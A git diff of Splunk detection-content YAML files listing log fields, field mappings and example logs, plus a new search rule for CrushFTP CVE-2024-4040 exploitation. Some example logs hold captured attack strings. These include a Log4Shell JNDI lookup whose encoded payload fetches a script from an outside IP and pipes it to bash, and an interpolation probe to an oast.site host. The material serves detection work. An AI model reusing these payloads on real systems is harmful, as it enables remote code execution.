- src_user
- status
- subject
- ta_windows_action
- tag
- user
- user_group
- vendor
- vendor_product
- Caller_Domain
- Caller_User_Name
- Channel
- CommandLine
- Computer
- Error_Code
- EventCode
- EventID
- EventRecordID
- Guid
- Keywords
- Level
- Logon_ID
- MandatoryLabel
- Name
- NewProcessId
- NewProcessName
- Opcode
- ParentProcessName
- ProcessID
- Process_Command_Line
- RecordNumber
- SubjectDomainName
- SubjectLogonId
- SubjectUserName
- SubjectUserSid
- SystemTime
- TargetDomainName
- TargetLogonId
- TargetUserName
- TargetUserSid
- Target_Domain
- Target_User_Name
- Task
- ThreadID
- TokenElevationType
- Token_Elevation_Type
- Token_Elevation_Type_id
- Version
- action
- app
- dest
- dvc
- dvc_nt_host
- event_id
- eventtype
- id
- name
- new_process
- new_process_id
- new_process_name
- parent_process
- parent_process_id
- parent_process_name
- parent_process_path
- process
- process_command_line_arguments
- process_command_line_process
- process_exec
- process_id
- process_name
- process_path
- product
- session_id
- signature
- signature_id
- src_nt_domain
- src_user
- status
- subject
- ta_windows_action
- tag
- user
- user_group
- vendor
- vendor_product
field_mappings:
- data_model: cim
data_set: Endpoint.Processes
@@ -1,90 +1,102 @@
event_name: Windows Event Log Security 5145
fields:
- _time
- AccessList
- AccessMask
- AccessReason
- Caller_Domain
- Caller_User_Name
- Channel
- Computer
- Error_Code
- EventCode
- EventData_Xml
- EventID
- EventRecordID
- Guid
- IpAddress
- IpPort
- Keywords
- Level
- Logon_ID
- Name
- ObjectType
- Opcode
- ProcessID
- RecordNumber
- RelativeTargetName
- ShareLocalPath
- ShareName
- Source_Port
- Source_Workstation
- SubjectDomainName
- SubjectLogonId
- SubjectUserName
- SubjectUserSid
- SystemTime
- System_Props_Xml
- Task
- ThreadID
- Version
- action
- app
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dvc
- dvc_nt_host
- event_id
- eventtype
- file_name
- file_path
- host
- id
- index
- linecount
- name
- product
- punct
- session_id
- signature
- signature_id
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_nt_domain
- src_nt_host
- src_port
- src_user
- status
- subject
- ta_windows_action
- tag
- tag::action
- tag::eventtype
- timeendpos
- timestartpos
- vendor
- vendor_product
- _time
- AccessList
- AccessMask
- AccessReason
- Caller_Domain
- Caller_User_Name
- Channel
- Computer
- Error_Code
- EventCode
- EventData_Xml
- EventID
- EventRecordID
- Guid
- IpAddress
- IpPort
- Keywords
- Level
- Logon_ID
- Name
- ObjectType
- Opcode
- ProcessID
- RecordNumber
- RelativeTargetName
- ShareLocalPath
- ShareName
- Source_Port
- Source_Workstation
- SubjectDomainName
- SubjectLogonId
- SubjectUserName
- SubjectUserSid
- SystemTime
- System_Props_Xml
- Task
- ThreadID
- Version
- action
- app
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dvc
- dvc_nt_host
- event_id
- eventtype
- file_name
- file_path
- host
- id
- index
- linecount
- name
- product
- punct
- session_id
- signature
- signature_id
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_nt_domain
- src_nt_host
- src_port
- src_user
- status
- subject
- ta_windows_action
- tag
- tag::action
- tag::eventtype
- timeendpos
- timestartpos
- vendor
- vendor_product
field_mappings:
- data_model: custom_cim
data_set: Endpoint.Processes
mapping:
AccessList: access_list
AccessMask: access_mask
AccessReason: access_result
ShareLocalPath: share_local_path
RelativeTargetName: relative_target_name
IpAddress: src_ip
IpPort: src_port
SubjectUserName: user
ShareName: share
- data_model: ocsf
mapping:
AccessList: access_list
@@ -99,6 +111,5 @@ field_mappings:
SubjectUserName: actor.user.name
SubjectLogonId: actor.session.uid
SubjectUserSid: actor.user.uid
EventID: metadata.event_code
ShareName: unmapped.EventData.ShareName
ShareName: share
example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5145</EventID><Version>0</Version><Level>0</Level><Task>12811</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-03-11T03:06:39.742608600Z'/><EventRecordID>2018939</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='304'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ANONYMOUS LOGON</Data><Data Name='SubjectUserName'>ANONYMOUS LOGON</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x13ef1b</Data><Data Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.15</Data><Data Name='IpPort'>50160</Data><Data Name='ShareName'>\\*\SYSVOL</Data><Data Name='ShareLocalPath'>\??\C:\Windows\SYSVOL\sysvol</Data><Data Name='RelativeTargetName'>lsarpc</Data><Data Name='AccessMask'>0x120089</Data><Data Name='AccessList'>%%1538
-1
View File
@@ -3,6 +3,5 @@ id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
author: Patrick Bareiss, Splunk
source: bro:http:json
sourcetype: bro:http:json
separator: null
supported_TA: {}
event_names: []
+61 -61
View File
@@ -3,70 +3,70 @@ id: c716a418-eab3-4df5-9dff-5420174e3068
author: Patrick Bareiss, Splunk
source: /var/log/nginx/access.log
sourcetype: nginx:plus:kv
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- category
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log: site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- category
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log:
site="www.example.com" server="www.example.com" dest_port="443" dest_ip="192.0.2.1"
src="198.51.100.1" src_ip="198.51.100.1" user="-" time_local="22/Feb/2024:13:00:00
-0500" protocol="HTTP/1.1" status="200" bytes_out="1073741000" bytes_in="234" http_referer="-"
http_user_agent="python-requests/2.25.1" nginx_version="1.18.0" http_x_forwarded_for="-"
@@ -3,32 +3,32 @@ id: 375c2b0e-d216-41ad-9406-200464595209
author: Patrick Bareiss, Splunk
source: pan:threat
sourcetype: pan:threat
separator: null
supported_TA:
name: Palo Alto Networks Add-on for Splunk
version: 8.1.1
url: https://splunkbase.splunk.com/app/2757
event_names: []
fields:
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log: May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log:
May 10 11:08:39 sjc.example.com 1,2022/05/10 11:08:38,013201004583,THREAT,url,2305,2022/05/10
11:08:38,2.18.4.7,1.2.3.4,2.18.4.7,1.2.3.4,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.1,Zero,2022/05/10
11:08:38,1535535,1,32880,443,32880,20077,0x1403000,tcp,allow,"sr.example.com/mgmt/tm/util/bash",(9999),allow-URL,informational,client-to-server,7081856864553612091,0xa000000000000000,United
States,United States,0,,0,,,1,"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36
@@ -3,32 +3,32 @@ id: 182a83bc-c31a-4817-8c7a-263744cec52a
author: Patrick Bareiss, Splunk
source: screenconnect_palo_traffic
sourcetype: pan:traffic
separator: null
supported_TA:
name: Palo Alto Networks Add-on for Splunk
version: 8.1.1
url: https://splunkbase.splunk.com/app/2757
event_names: []
fields:
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log: 577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log:
577 <14>1 2024-02-22T12:33:50-05:00 PALO220.ATTACK_RANGE.LAN - - - -
1,2024/02/22 12:33:50,012801036556,TRAFFIC,end,2305,2024/02/22 12:33:50,192.168.1.205,147.28.146.44,201.17.96.104,147.28.146.44,No_Vuln_Filtering_OUT,,,screenconnect,vsys1,Trust,Untrust,ethernet1/2,ethernet1/1,splunk_range,2024/02/22
12:33:50,14740,1,50624,443,11024,443,0x40005e,tcp,allow,7419,6609,810,25,2024/02/22
12:32:29,65,any,0,376156893,0x0,192.168.0.0-192.168.255.255,United States,0,14,11,tcp-fin,0,0,0,0,,PALO220,from-policy,,,0,,0,,N/A,0,0,0,0,0862e58b-4a54-436b-b3ac-ea3eccf8403b,0,0,,,,,,,
+47 -47
View File
@@ -3,59 +3,59 @@ id: b12f601c-7f66-4d31-ab3c-a9ab03a597d5
author: Patrick Bareiss, Splunk
source: stream
sourcetype: stream:http
separator: null
supported_TA:
name: Splunk App for Stream
version: 8.1.1
url: https://splunkbase.splunk.com/app/1809
event_names: []
fields:
- _time
- bytes
- bytes_in
- bytes_out
- cookie
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- dest_mac
- dest_port
- endtime
- flow_id
- form_data
- host
- http_comment
- http_content_length
- http_content_type
- http_method
- http_user_agent
- index
- linecount
- protocol_stack
- punct
- request
- server
- site
- source
- sourcetype
- splunk_server
- src_ip
- src_mac
- src_port
- status
- time_taken
- timeendpos
- timestamp
- timestartpos
- transport
- uri_path
example_log: '{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
- _time
- bytes
- bytes_in
- bytes_out
- cookie
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- dest_mac
- dest_port
- endtime
- flow_id
- form_data
- host
- http_comment
- http_content_length
- http_content_type
- http_method
- http_user_agent
- index
- linecount
- protocol_stack
- punct
- request
- server
- site
- source
- sourcetype
- splunk_server
- src_ip
- src_mac
- src_port
- status
- time_taken
- timeendpos
- timestamp
- timestartpos
- transport
- uri_path
example_log:
'{"endtime":"2021-04-21T08:12:01.084527Z","timestamp":"2021-04-21T08:12:01.082573Z","bytes":1674,"bytes_in":914,"bytes_out":760,"cookie":"session_id_8000=81beacd6cc82670cf51f101406b6f2e6dc00c023;
splunkweb_csrf_token_8000=13513429838815417873; splunkd_8000=K_rZQa3n41JuL47HXxuyhPs6Uyg8ERiczX9k1NeOAcgeh5ujYRYXTZsScYZFpzbKV4a8q62CvlhCbXYeAHI6vhsEyaR4vE9Rzdq7Mt25A4QrsqooUEcqB_u5bptLgvpr^z1FCN","dest_ip":"10.0.1.12","dest_mac":"02:DA:73:7B:81:70","dest_port":8000,"flow_id":"b18ec342-0a3b-4fb6-b91e-a7b576687fd7","form_data":"output_mode=json&action=touch","http_comment":"HTTP/1.1
200 OK","http_content_length":59,"http_content_type":"application/json; charset=UTF-8","http_method":"POST","http_user_agent":"Mozilla/5.0
(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128
@@ -3,7 +3,6 @@ id: 4b1233d1-f80a-4da1-ab27-a5b10ea8a4ce
author: Patrick Bareiss, Splunk
source: stream:tcp
sourcetype: stream:tcp
separator: null
supported_TA:
name: Splunk App for Stream
version: 8.1.1
+81 -81
View File
@@ -3,93 +3,93 @@ id: 780086dc-2384-45b6-ade7-56cb00105464
author: Patrick Bareiss, Splunk
source: aws
sourcetype: aws:cloudfront:accesslogs
separator: null
supported_TA:
name: Splunk Add-on for Amazon Web Services (AWS)
version: 7.4.1
url: https://splunkbase.splunk.com/app/1876
event_names: []
fields:
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- c_ip
- c_port
- cached
- category
- client_ip
- cs_bytes
- cs_cookie
- cs_host
- cs_method
- cs_protocol
- cs_protocol_version
- cs_referer
- cs_uri_query
- cs_uri_stem
- cs_user_agent
- date
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- duration
- edge_location_name
- eventtype
- fle_encrypted_fields
- fle_status
- host
- http_content_type
- http_method
- http_user_agent
- http_user_agent_length
- index
- linecount
- punct
- response_time
- sc_bytes
- sc_content_len
- sc_content_type
- sc_range_end
- sc_range_start
- sc_status
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_port
- ssl_cipher
- ssl_protocol
- status
- tag
- tag::eventtype
- time
- time_taken
- time_to_first_byte
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor_product
- x_edge_detail_result_type
- x_edge_location
- x_edge_request_id
- x_edge_response_result_type
- x_edge_result_type
- x_forwarded_for
- x_host_header
example_log: "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- c_ip
- c_port
- cached
- category
- client_ip
- cs_bytes
- cs_cookie
- cs_host
- cs_method
- cs_protocol
- cs_protocol_version
- cs_referer
- cs_uri_query
- cs_uri_stem
- cs_user_agent
- date
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- duration
- edge_location_name
- eventtype
- fle_encrypted_fields
- fle_status
- host
- http_content_type
- http_method
- http_user_agent
- http_user_agent_length
- index
- linecount
- punct
- response_time
- sc_bytes
- sc_content_len
- sc_content_type
- sc_range_end
- sc_range_start
- sc_status
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_port
- ssl_cipher
- ssl_protocol
- status
- tag
- tag::eventtype
- time
- time_taken
- time_to_first_byte
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor_product
- x_edge_detail_result_type
- x_edge_location
- x_edge_request_id
- x_edge_response_result_type
- x_edge_result_type
- x_forwarded_for
- x_host_header
example_log:
"2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
/plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
-\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
+66 -66
View File
@@ -3,73 +3,73 @@ id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
author: Patrick Bareiss, Splunk
source: bro:http:json
sourcetype: bro:http:json
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- bytes
- bytes_in
- bytes_out
- dest
- dest_host
- dest_ip
- dest_port
- direction
- dvc
- eventtype
- flow_id
- host
- host_header
- http_content_type
- http_method
- http_user_agent
- http_user_agent_length
- id.orig_h
- id.orig_p
- id.resp_h
- id.resp_p
- id_orig_h
- id_orig_p
- id_resp_h
- index
- is_broadcast
- is_dest_internal_ip
- is_src_internal_ip
- linecount
- method
- product
- punct
- request_body_len
- resp_fuids
- resp_fuids{}
- resp_mime_types
- resp_mime_types{}
- response_body_len
- sensor_name
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_port
- status
- status_code
- status_msg
- tag
- tag::eventtype
- timestamp
- trans_depth
- ts
- uid
- uri
- uri_path
- uri_query
- url
- user_agent
- vendor
- vendor_product
- version
example_log: '{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
- _time
- bytes
- bytes_in
- bytes_out
- dest
- dest_host
- dest_ip
- dest_port
- direction
- dvc
- eventtype
- flow_id
- host
- host_header
- http_content_type
- http_method
- http_user_agent
- http_user_agent_length
- id.orig_h
- id.orig_p
- id.resp_h
- id.resp_p
- id_orig_h
- id_orig_p
- id_resp_h
- index
- is_broadcast
- is_dest_internal_ip
- is_src_internal_ip
- linecount
- method
- product
- punct
- request_body_len
- resp_fuids
- resp_fuids{}
- resp_mime_types
- resp_mime_types{}
- response_body_len
- sensor_name
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- src_port
- status
- status_code
- status_msg
- tag
- tag::eventtype
- timestamp
- trans_depth
- ts
- uid
- uri
- uri_path
- uri_query
- url
- user_agent
- vendor
- vendor_product
- version
example_log:
'{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
(Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36","request_body_len":0,"response_body_len":121,"status_code":404,"status_msg":"","tags":[],"resp_fuids":["FxuRnn2rNk2RjIfQQ8"],"resp_mime_types":["text/json"]}'
+66 -66
View File
@@ -3,75 +3,75 @@ id: c716a418-eab3-4df5-9dff-5420174e3068
author: Patrick Bareiss, Splunk
source: /var/log/nginx/access.log
sourcetype: nginx:plus:kv
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- JSESSIONID
- action
- app
- bootstrapStatusProvider_applicationConfig_setupComplete
- bytes
- bytes_in
- bytes_out
- category
- charset
- cookie
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- uri_query
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log: site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
- _time
- JSESSIONID
- action
- app
- bootstrapStatusProvider_applicationConfig_setupComplete
- bytes
- bytes_in
- bytes_out
- category
- charset
- cookie
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- uri_query
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log:
site="confluence.catjamfest.com" server="confluence.catjamfest.com" dest_port="80"
dest_ip="10.0.1.23" src="94.131.112.187" src_ip="94.131.112.187" user="-" time_local="22/Oct/2023:03:03:47
+0000" protocol="HTTP/1.1" status="200" bytes_out="7411" bytes_in="7378" http_referer="-"
http_user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
+20 -20
View File
@@ -3,32 +3,32 @@ id: 375c2b0e-d216-41ad-9406-200464595209
author: Patrick Bareiss, Splunk
source: pan:threat
sourcetype: pan:threat
separator: null
supported_TA:
name: Palo Alto Networks Add-on for Splunk
version: 8.1.1
url: https://splunkbase.splunk.com/app/2757
event_names: []
fields:
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log: Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
- _time
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- timeendpos
- timestartpos
example_log:
Feb 21 16:10:35 02.examplec.com 1,2023/02/21 16:10:35,016201013292,THREAT,file,2561,2023/02/21
16:10:35,6.1.1.2,5.2.1.1,6.1.1.2,5.2.1.1,service-globalprotect,,,web-browsing,vsys1,UNTRUST,UNTRUST,ethernet1/20,loopback.2,zero,2023/02/21
16:10:35,685983,1,48598,443,48598,20077,0x1402000,tcp,alert,"payload.zip",ZIP(52004),allow-example-URL,low,client-to-server,7140821242043239124,0x8000000000000000,Germany,United
States,,,0,,,1,,,,,,,,0,177,204,178,197,,02,1.examplecorp.com/configWizard/keyUpload.jsp,,,,0,,0,,N/A,unknown,AppThreat-8677-7862,0x0,0,4294967295,,,be9fa539-d3c9-43f2-b1cb-ae2c91564e4f,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2023-02-21T16:10:35.249+00:00,,,,internet-utility,general-internet,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,web-browsing,no,no
+29 -30
View File
@@ -3,39 +3,38 @@ id: b0070a33-92ed-49e5-8f38-576cdf300710
author: Patrick Bareiss, Splunk
source: stream:http
sourcetype: stream:http
separator: null
supported_TA:
name: Splunk App for Stream
version: 8.1.1
url: https://splunkbase.splunk.com/app/1809
event_names: []
fields:
- _time
- count
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- endtime
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- src_ip
- sum(bytes)
- sum(packets_in)
- sum(packets_out)
- timeendpos
- timestamp
- timestartpos
- values(flow_id){}
- vxlan_id
example_log: ''
- _time
- count
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- endtime
- host
- index
- linecount
- punct
- source
- sourcetype
- splunk_server
- src_ip
- sum(bytes)
- sum(packets_in)
- sum(packets_out)
- timeendpos
- timestamp
- timestartpos
- values(flow_id){}
- vxlan_id
example_log: ""
+62 -62
View File
@@ -3,74 +3,74 @@ id: c96f5906-f601-4f32-a26c-482535159bc2
author: Patrick Bareiss, Splunk
source: stream:ip
sourcetype: stream:ip
separator: null
supported_TA:
name: Splunk App for Stream
version: 8.1.1
url: https://splunkbase.splunk.com/app/1809
event_names: []
fields:
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- category
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_referrer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log: site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
- _time
- action
- app
- bytes
- bytes_in
- bytes_out
- category
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest
- dest_ip
- dest_port
- eventtype
- host
- http_content_type
- http_method
- http_referer
- http_referrer
- http_user_agent
- http_user_agent_length
- http_x_forwarded_for
- http_x_header
- https
- index
- linecount
- nginx_version
- product
- protocol
- punct
- request_time
- response_time
- server
- site
- source
- sourcetype
- splunk_server
- src
- src_ip
- status
- status_description
- status_type
- tag
- tag::eventtype
- time_local
- timeendpos
- timestartpos
- uri_path
- url
- url_domain
- url_length
- vendor
- vendor_product
- version
- web_server
example_log:
site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1"
src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000"
protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]"
http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-"
+46 -47
View File
@@ -3,54 +3,53 @@ id: 64b245d4-a4d1-4865-a718-c83d3b939f2e
author: Patrick Bareiss, Splunk
source: suricata
sourcetype: suricata
separator: null
supported_TA: {}
event_names: []
fields:
- _time
- app_proto
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- dest_port
- event_type
- flow.age
- flow.alerted
- flow.bytes_toclient
- flow.bytes_toserver
- flow.end
- flow.pkts_toclient
- flow.pkts_toserver
- flow.reason
- flow.start
- flow.state
- flow_id
- host
- in_iface
- index
- linecount
- proto
- punct
- source
- sourcetype
- splunk_server
- src_ip
- src_port
- tcp.ack
- tcp.fin
- tcp.psh
- tcp.state
- tcp.syn
- tcp.tcp_flags
- tcp.tcp_flags_tc
- tcp.tcp_flags_ts
- timeendpos
- timestamp
- timestartpos
- _time
- app_proto
- date_hour
- date_mday
- date_minute
- date_month
- date_second
- date_wday
- date_year
- date_zone
- dest_ip
- dest_port
- event_type
- flow.age
- flow.alerted
- flow.bytes_toclient
- flow.bytes_toserver
- flow.end
- flow.pkts_toclient
- flow.pkts_toserver
- flow.reason
- flow.start
- flow.state
- flow_id
- host
- in_iface
- index
- linecount
- proto
- punct
- source
- sourcetype
- splunk_server
- src_ip
- src_port
- tcp.ack
- tcp.fin
- tcp.psh
- tcp.state
- tcp.syn
- tcp.tcp_flags
- tcp.tcp_flags_tc
- tcp.tcp_flags_ts
- timeendpos
- timestamp
- timestartpos
example_log: '{"timestamp":"2023-10-17T01:24:52.149017+0000","flow_id":721124494649885,"in_iface":"ens5","event_type":"flow","src_ip":"192.0.2.1","src_port":30880,"dest_ip":"192.0.2.2","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":640,"bytes_toclient":660,"start":"2023-10-17T01:20:23.829981+0000","end":"2023-10-17T01:22:11.831172+0000","age":108,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}}'
@@ -0,0 +1,63 @@
name: CrushFTP Server Side Template Injection
id: ccf6b7a3-bd39-4bc9-a949-143a8d640dbc
version: 1
date: '2024-05-16'
author: Michael Haag, Splunk
data_source: []
type: TTP
status: production
description: This analytic is designed to identify attempts to exploit a server-side template injection vulnerability in CrushFTP, designated as CVE-2024-4040. This severe vulnerability enables unauthenticated remote attackers to access and read files beyond the VFS Sandbox, circumvent authentication protocols, and execute arbitrary commands on the affected server. The issue impacts all versions of CrushFTP up to 10.7.1 and 11.1.0 on all supported platforms. It is highly recommended to apply patches immediately to prevent unauthorized access to the system and avoid potential data compromises. The search specifically looks for patterns in the raw log data that match the exploitation attempts, including READ or WRITE actions, and extracts relevant information such as the protocol, session ID, user, IP address, HTTP method, and the URI queried. It then evaluates these logs to confirm traces of exploitation based on the presence of specific keywords and the originating IP address, counting and sorting these events for further analysis.
search: '`crushftp`
| rex field=_raw "\[(?<protocol>HTTPS|HTTP):(?<session_id>[^\:]+):(?<user>[^\:]+):(?<src_ip>\d+\.\d+\.\d+\.\d+)\] (?<action>READ|WROTE): \*(?<http_method>[A-Z]+) (?<uri_query>[^\s]+) HTTP/[^\*]+\*"
| eval message=if(match(_raw, "INCLUDE") and isnotnull(src_ip), "traces of exploitation by " . src_ip, "false")
| search message!=false
| rename host as dest
| stats count by _time, dest, source, message, src_ip, http_method, uri_query, user, action
| sort -_time| `crushftp_server_side_template_injection_filter`'
